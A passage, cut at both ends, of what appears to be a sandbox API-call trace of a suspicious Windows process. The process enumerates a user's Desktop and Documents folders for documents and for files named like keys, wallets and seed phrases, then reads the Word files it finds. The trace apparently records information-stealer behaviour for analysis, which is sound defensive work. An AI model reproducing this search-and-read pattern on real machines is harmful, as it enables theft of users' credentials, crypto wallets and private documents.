lpBuffer="C:\\Users\\kEecfMwgj\\Desktop", lpFilePart=0x0) returned 0x1a [0279.974] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\*.doc*", lpFindFileData=0x43e870 | out: lpFindFileData=0x43e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3e59610, ftCreationTime.dwHighDateTime=0x1d7ddca, ftLastAccessTime.dwLowDateTime=0x99168d70, ftLastAccessTime.dwHighDateTime=0x1d7e2e1, ftLastWriteTime.dwLowDateTime=0x99168d70, ftLastWriteTime.dwHighDateTime=0x1d7e2e1, nFileSizeHigh=0x0, nFileSizeLow=0xcfd0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1BY5mTkcZANR.docx", cAlternateFileName="1BY5MT~1.DOC")) returned 0x59c298 [0279.975] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e878 | out: lpFindFileData=0x43e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a2c3890, ftCreationTime.dwHighDateTime=0x1d7dc03, ftLastAccessTime.dwLowDateTime=0xdc52f260, ftLastAccessTime.dwHighDateTime=0x1d7de5c, ftLastWriteTime.dwLowDateTime=0xdc52f260, ftLastWriteTime.dwHighDateTime=0x1d7de5c, nFileSizeHigh=0x0, nFileSizeLow=0xc95c, dwReserved0=0x0, dwReserved1=0x0, cFileName="CduSDavY.doc", cAlternateFileName="")) returned 1 [0279.975] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e878 | out: lpFindFileData=0x43e878*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0279.975] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0279.975] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e830) returned 1 [0279.975] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43ea90) returned 1 [0279.975] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43eac0) returned 1 [0279.976] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop", nBufferLength=0x105, lpBuffer=0x43e5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop", lpFilePart=0x0) returned 0x1a [0279.976] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\*key*", lpFindFileData=0x43e870 | out: lpFindFileData=0x43e870*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.976] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e830) returned 1 [0279.976] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43ea90) returned 1 [0279.976] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43eac0) returned 1 [0279.976] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop", nBufferLength=0x105, lpBuffer=0x43e5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop", lpFilePart=0x0) returned 0x1a [0279.976] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\*wallet*", lpFindFileData=0x43e870 | out: lpFindFileData=0x43e870*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.977] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e830) returned 1 [0279.977] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43ea90) returned 1 [0279.977] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43eac0) returned 1 [0279.977] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop", nBufferLength=0x105, lpBuffer=0x43e5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop", lpFilePart=0x0) returned 0x1a [0279.977] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\*seed*", lpFindFileData=0x43e870 | out: lpFindFileData=0x43e870*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.977] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e830) returned 1 [0279.977] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43ea90) returned 1 [0279.979] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\1BY5mTkcZANR.docx", nBufferLength=0x105, lpBuffer=0x43e63c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\1BY5mTkcZANR.docx", lpFilePart=0x0) returned 0x2c [0279.979] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e8c8) returned 1 [0279.979] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\1BY5mTkcZANR.docx" (normalized: "c:\\users\\keecfmwgj\\desktop\\1by5mtkczanr.docx"), fInfoLevelId=0x0, lpFileInformation=0x27e5628 | out: lpFileInformation=0x27e5628*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3e59610, ftCreationTime.dwHighDateTime=0x1d7ddca, ftLastAccessTime.dwLowDateTime=0x99168d70, ftLastAccessTime.dwHighDateTime=0x1d7e2e1, ftLastWriteTime.dwLowDateTime=0x99168d70, ftLastWriteTime.dwHighDateTime=0x1d7e2e1, nFileSizeHigh=0x0, nFileSizeLow=0xcfd0)) returned 1 [0279.979] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e8c4) returned 1 [0279.979] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop", nBufferLength=0x105, lpBuffer=0x43e630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop", lpFilePart=0x0) returned 0x1a [0279.982] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\1BY5mTkcZANR.docx", nBufferLength=0x105, lpBuffer=0x43e628, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\1BY5mTkcZANR.docx", lpFilePart=0x0) returned 0x2c [0279.988] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\1BY5mTkcZANR.docx", nBufferLength=0x105, lpBuffer=0x43e5fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\1BY5mTkcZANR.docx", lpFilePart=0x0) returned 0x2c [0279.988] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e83c) returned 1 [0279.988] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\1BY5mTkcZANR.docx" (normalized: "c:\\users\\keecfmwgj\\desktop\\1by5mtkczanr.docx"), fInfoLevelId=0x0, lpFileInformation=0x43eb00 | out: lpFileInformation=0x43eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3e59610, ftCreationTime.dwHighDateTime=0x1d7ddca, ftLastAccessTime.dwLowDateTime=0x99168d70, ftLastAccessTime.dwHighDateTime=0x1d7e2e1, ftLastWriteTime.dwLowDateTime=0x99168d70, ftLastWriteTime.dwHighDateTime=0x1d7e2e1, nFileSizeHigh=0x0, nFileSizeLow=0xcfd0)) returned 1 [0279.988] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e838) returned 1 [0279.988] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\1BY5mTkcZANR.docx", nBufferLength=0x105, lpBuffer=0x43e540, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\1BY5mTkcZANR.docx", lpFilePart=0x0) returned 0x2c [0279.988] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea58) returned 1 [0279.988] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\1BY5mTkcZANR.docx" (normalized: "c:\\users\\keecfmwgj\\desktop\\1by5mtkczanr.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0279.989] GetFileType (hFile=0x480) returned 0x1 [0279.989] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43ea54) returned 1 [0279.989] GetFileType (hFile=0x480) returned 0x1 [0279.993] ReadFile (in: hFile=0x480, lpBuffer=0x27e6b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x27e6b2c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0279.995] ReadFile (in: hFile=0x480, lpBuffer=0x27e6b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x27e6b2c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0279.996] ReadFile (in: hFile=0x480, lpBuffer=0x27e6b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x27e6b2c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0279.996] ReadFile (in: hFile=0x480, lpBuffer=0x27e6b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x27e6b2c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0279.998] ReadFile (in: hFile=0x480, lpBuffer=0x27e6b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x27e6b2c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0279.998] ReadFile (in: hFile=0x480, lpBuffer=0x27e6b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x27e6b2c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0279.999] ReadFile (in: hFile=0x480, lpBuffer=0x27e6b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x27e6b2c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0279.999] ReadFile (in: hFile=0x480, lpBuffer=0x27e6b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x27e6b2c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0279.999] ReadFile (in: hFile=0x480, lpBuffer=0x27e6b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x27e6b2c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.000] ReadFile (in: hFile=0x480, lpBuffer=0x27e6b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x27e6b2c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.047] ReadFile (in: hFile=0x480, lpBuffer=0x27e6b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x27e6b2c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.048] ReadFile (in: hFile=0x480, lpBuffer=0x27e6b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x27e6b2c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.049] ReadFile (in: hFile=0x480, lpBuffer=0x27e6b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x27e6b2c*, lpNumberOfBytesRead=0x43eac4*=0xfd0, lpOverlapped=0x0) returned 1 [0280.049] ReadFile (in: hFile=0x480, lpBuffer=0x27e6290, nNumberOfBytesToRead=0x30, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x27e6290*, lpNumberOfBytesRead=0x43eac4*=0x0, lpOverlapped=0x0) returned 1 [0280.049] ReadFile (in: hFile=0x480, lpBuffer=0x27e6b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x27e6b2c*, lpNumberOfBytesRead=0x43eac4*=0x0, lpOverlapped=0x0) returned 1 [0280.053] CloseHandle (hObject=0x480) returned 1 [0280.053] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\CduSDavY.doc", nBufferLength=0x105, lpBuffer=0x43e63c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\CduSDavY.doc", lpFilePart=0x0) returned 0x27 [0280.053] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e8c8) returned 1 [0280.053] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\CduSDavY.doc" (normalized: "c:\\users\\keecfmwgj\\desktop\\cdusdavy.doc"), fInfoLevelId=0x0, lpFileInformation=0x2810c44 | out: lpFileInformation=0x2810c44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a2c3890, ftCreationTime.dwHighDateTime=0x1d7dc03, ftLastAccessTime.dwLowDateTime=0xdc52f260, ftLastAccessTime.dwHighDateTime=0x1d7de5c, ftLastWriteTime.dwLowDateTime=0xdc52f260, ftLastWriteTime.dwHighDateTime=0x1d7de5c, nFileSizeHigh=0x0, nFileSizeLow=0xc95c)) returned 1 [0280.053] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e8c4) returned 1 [0280.054] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop", nBufferLength=0x105, lpBuffer=0x43e630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop", lpFilePart=0x0) returned 0x1a [0280.054] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\CduSDavY.doc", nBufferLength=0x105, lpBuffer=0x43e628, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\CduSDavY.doc", lpFilePart=0x0) returned 0x27 [0280.054] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\CduSDavY.doc", nBufferLength=0x105, lpBuffer=0x43e5fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\CduSDavY.doc", lpFilePart=0x0) returned 0x27 [0280.054] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e83c) returned 1 [0280.054] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\CduSDavY.doc" (normalized: "c:\\users\\keecfmwgj\\desktop\\cdusdavy.doc"), fInfoLevelId=0x0, lpFileInformation=0x43eb00 | out: lpFileInformation=0x43eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a2c3890, ftCreationTime.dwHighDateTime=0x1d7dc03, ftLastAccessTime.dwLowDateTime=0xdc52f260, ftLastAccessTime.dwHighDateTime=0x1d7de5c, ftLastWriteTime.dwLowDateTime=0xdc52f260, ftLastWriteTime.dwHighDateTime=0x1d7de5c, nFileSizeHigh=0x0, nFileSizeLow=0xc95c)) returned 1 [0280.054] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e838) returned 1 [0280.054] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\CduSDavY.doc", nBufferLength=0x105, lpBuffer=0x43e540, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\CduSDavY.doc", lpFilePart=0x0) returned 0x27 [0280.054] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea58) returned 1 [0280.054] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\CduSDavY.doc" (normalized: "c:\\users\\keecfmwgj\\desktop\\cdusdavy.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0280.054] GetFileType (hFile=0x480) returned 0x1 [0280.054] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43ea54) returned 1 [0280.054] GetFileType (hFile=0x480) returned 0x1 [0280.055] ReadFile (in: hFile=0x480, lpBuffer=0x2811e94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x2811e94*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.056] ReadFile (in: hFile=0x480, lpBuffer=0x2811e94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x2811e94*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.056] ReadFile (in: hFile=0x480, lpBuffer=0x2811e94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x2811e94*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.057] ReadFile (in: hFile=0x480, lpBuffer=0x2811e94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x2811e94*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.057] ReadFile (in: hFile=0x480, lpBuffer=0x2811e94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x2811e94*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.058] ReadFile (in: hFile=0x480, lpBuffer=0x2811e94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x2811e94*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.059] ReadFile (in: hFile=0x480, lpBuffer=0x2811e94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x2811e94*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.059] ReadFile (in: hFile=0x480, lpBuffer=0x2811e94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x2811e94*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.059] ReadFile (in: hFile=0x480, lpBuffer=0x2811e94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x2811e94*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.060] ReadFile (in: hFile=0x480, lpBuffer=0x2811e94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x2811e94*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.060] ReadFile (in: hFile=0x480, lpBuffer=0x2811e94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x2811e94*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.060] ReadFile (in: hFile=0x480, lpBuffer=0x2811e94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x2811e94*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.061] ReadFile (in: hFile=0x480, lpBuffer=0x2811e94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x2811e94*, lpNumberOfBytesRead=0x43eac4*=0x95c, lpOverlapped=0x0) returned 1 [0280.061] ReadFile (in: hFile=0x480, lpBuffer=0x2811384, nNumberOfBytesToRead=0x2a4, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x2811384*, lpNumberOfBytesRead=0x43eac4*=0x0, lpOverlapped=0x0) returned 1 [0280.061] ReadFile (in: hFile=0x480, lpBuffer=0x2811e94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x2811e94*, lpNumberOfBytesRead=0x43eac4*=0x0, lpOverlapped=0x0) returned 1 [0280.065] CloseHandle (hObject=0x480) returned 1 [0280.066] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%", lpDst=0x43ea1c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.066] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%\\Documents", lpDst=0x43ea1c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\Documents") returned 0x1d [0280.066] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43eac0) returned 1 [0280.066] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x43e5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0280.066] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\*.txt", lpFindFileData=0x43e870 | out: lpFindFileData=0x43e870*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.066] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e830) returned 1 [0280.067] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43ea90) returned 1 [0280.067] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43eac0) returned 1 [0280.067] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x43e5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0280.067] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\*.doc*", lpFindFileData=0x43e870 | out: lpFindFileData=0x43e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98248080, ftCreationTime.dwHighDateTime=0x1d7c15c, ftLastAccessTime.dwLowDateTime=0x521f6df0, ftLastAccessTime.dwHighDateTime=0x1d7d00e, ftLastWriteTime.dwLowDateTime=0x521f6df0, ftLastWriteTime.dwHighDateTime=0x1d7d00e, nFileSizeHigh=0x0, nFileSizeLow=0x14411, dwReserved0=0x0, dwReserved1=0x0, cFileName="7VZCVQe.docx", cAlternateFileName="7VZCVQ~1.DOC")) returned 0x59c298 [0280.067] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e878 | out: lpFindFileData=0x43e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5adbb80, ftCreationTime.dwHighDateTime=0x1d77dc0, ftLastAccessTime.dwLowDateTime=0x8ad8cd60, ftLastAccessTime.dwHighDateTime=0x1d7d5b5, ftLastWriteTime.dwLowDateTime=0x8ad8cd60, ftLastWriteTime.dwHighDateTime=0x1d7d5b5, nFileSizeHigh=0x0, nFileSizeLow=0x13a69, dwReserved0=0x0, dwReserved1=0x0, cFileName="IvDexdy_r Oq.docx", cAlternateFileName="IVDEXD~1.DOC")) returned 1 [0280.067] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e878 | out: lpFindFileData=0x43e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3538e2e0, ftCreationTime.dwHighDateTime=0x1d769fa, ftLastAccessTime.dwLowDateTime=0x6803aeb0, ftLastAccessTime.dwHighDateTime=0x1d7b218, ftLastWriteTime.dwLowDateTime=0x6803aeb0, ftLastWriteTime.dwHighDateTime=0x1d7b218, nFileSizeHigh=0x0, nFileSizeLow=0xc17, dwReserved0=0x0, dwReserved1=0x0, cFileName="KangmawL.docx", cAlternateFileName="KANGMA~1.DOC")) returned 1 [0280.067] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e878 | out: lpFindFileData=0x43e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x770dc980, ftCreationTime.dwHighDateTime=0x1d7689f, ftLastAccessTime.dwLowDateTime=0x3786f610, ftLastAccessTime.dwHighDateTime=0x1d779a7, ftLastWriteTime.dwLowDateTime=0x3786f610, ftLastWriteTime.dwHighDateTime=0x1d779a7, nFileSizeHigh=0x0, nFileSizeLow=0x12cd8, dwReserved0=0x0, dwReserved1=0x0, cFileName="t6GW4d_MTgVoESu.docx", cAlternateFileName="T6GW4D~1.DOC")) returned 1 [0280.067] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e878 | out: lpFindFileData=0x43e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x94fade60, ftCreationTime.dwHighDateTime=0x1d7a2dd, ftLastAccessTime.dwLowDateTime=0xd6fc5590, ftLastAccessTime.dwHighDateTime=0x1d7c4a8, ftLastWriteTime.dwLowDateTime=0xd6fc5590, ftLastWriteTime.dwHighDateTime=0x1d7c4a8, nFileSizeHigh=0x0, nFileSizeLow=0x660b, dwReserved0=0x0, dwReserved1=0x0, cFileName="W0TV7ENECKo 9vK.docx", cAlternateFileName="W0TV7E~1.DOC")) returned 1 [0280.067] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e878 | out: lpFindFileData=0x43e878*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0280.067] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0280.067] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e830) returned 1 [0280.067] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43ea90) returned 1 [0280.067] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43eac0) returned 1 [0280.067] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x43e5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0280.068] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\*key*", lpFindFileData=0x43e870 | out: lpFindFileData=0x43e870*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.068] SetThreadErrorMode (dwNewMode=0x0, 